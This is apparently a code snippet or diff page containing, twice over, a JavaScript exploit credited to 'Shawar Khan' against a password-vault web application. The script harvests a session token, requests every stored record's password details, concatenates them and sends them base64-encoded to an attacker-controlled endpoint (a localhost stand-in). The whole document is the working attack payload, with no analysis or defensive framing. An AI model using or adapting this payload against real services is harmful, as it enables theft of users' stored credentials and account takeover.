waidakyaw · August 20, 2018 15:06
diff --git a/password_vault_exploit.js b/password_vault_exploit.js
 //Exploit Code by Shawar Khan

 var data_chunks = '';
 // Capturing Records from API
 fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) {
    
    // Holds the records in as String
    var allrecords = data; 
    
    // converting response to JSON
    json_allrecords = JSON.parse(allrecords)['records'];

    // holds record Ids
 	var record_ids  = new Array(); 
 	Object.entries(json_allrecords).forEach(function(obj) {
 	    record_ids.push((obj['1']['0']['id']));
 	});

 	// Capturing Session Token / Used to send POST requests
 	fetch('https://redacted.com/api/v1/session/token').then((resp) => resp.text()).then(function(data1) {

 		// Holds Session Token
 		var session_token = JSON.parse(data1)['session_token'];

 		data_chunks  = ""; // Will hold a complete record
 		
 		//Put loop for itterating through IDS
 		record_ids.forEach(function(record_id) {
 			    // Looping through IDs and grabing Passwords
 				var grab_password = new XMLHttpRequest(); 
 				grab_password.open('POST', 'https://redacted.com/api/v1/passwords/record', true);
 				grab_password.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
 				grab_password.setRequestHeader("token", session_token);
 				
 				grab_password.onload = function () {   
 					response_password = this.responseText;
 					parsed_passwords = JSON.parse(response_password);
 					// Sending data chunks
 					data_chunks += parsed_passwords['record']['description']
 					data_chunks += "\n"+parsed_passwords['record']['details']['0']['value']
 					data_chunks += "\n"+parsed_passwords['record']['details']['1']['value']
 					data_chunks += "\n"+parsed_passwords['record']['details']['2']['value']+"\n\n"
 							};
 				
 				grab_password.send(JSON.stringify({id:record_id,is_organization:false}));
 		});
 		setTimeout(function(){ // Submitting Data Chunks to Attacker
     		fetch('http://127.0.0.1/?data='+btoa(data_chunks))
 		}, 2000);


 	});

 });
	//Exploit Code by Shawar Khan

	var data_chunks = '';
	// Capturing Records from API
	fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) {

	// Holds the records in as String
	var allrecords = data;

	// converting response to JSON
	json_allrecords = JSON.parse(allrecords)['records'];

	// holds record Ids
	var record_ids = new Array();
	Object.entries(json_allrecords).forEach(function(obj) {
	record_ids.push((obj['1']['0']['id']));
	});

	// Capturing Session Token / Used to send POST requests
	fetch('https://redacted.com/api/v1/session/token').then((resp) => resp.text()).then(function(data1) {

	// Holds Session Token
	var session_token = JSON.parse(data1)['session_token'];

	data_chunks = ""; // Will hold a complete record

	//Put loop for itterating through IDS
	record_ids.forEach(function(record_id) {
	// Looping through IDs and grabing Passwords
	var grab_password = new XMLHttpRequest();
	grab_password.open('POST', 'https://redacted.com/api/v1/passwords/record', true);
	grab_password.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
	grab_password.setRequestHeader("token", session_token);

	grab_password.onload = function () {
	response_password = this.responseText;
	parsed_passwords = JSON.parse(response_password);
	// Sending data chunks
	data_chunks += parsed_passwords['record']['description']
	data_chunks += "\n"+parsed_passwords['record']['details']['0']['value']
	data_chunks += "\n"+parsed_passwords['record']['details']['1']['value']
	data_chunks += "\n"+parsed_passwords['record']['details']['2']['value']+"\n\n"
	};

	grab_password.send(JSON.stringify({id:record_id,is_organization:false}));
	});
	setTimeout(function(){ // Submitting Data Chunks to Attacker
	fetch('http://127.0.0.1/?data='+btoa(data_chunks))
	}, 2000);


	});

	});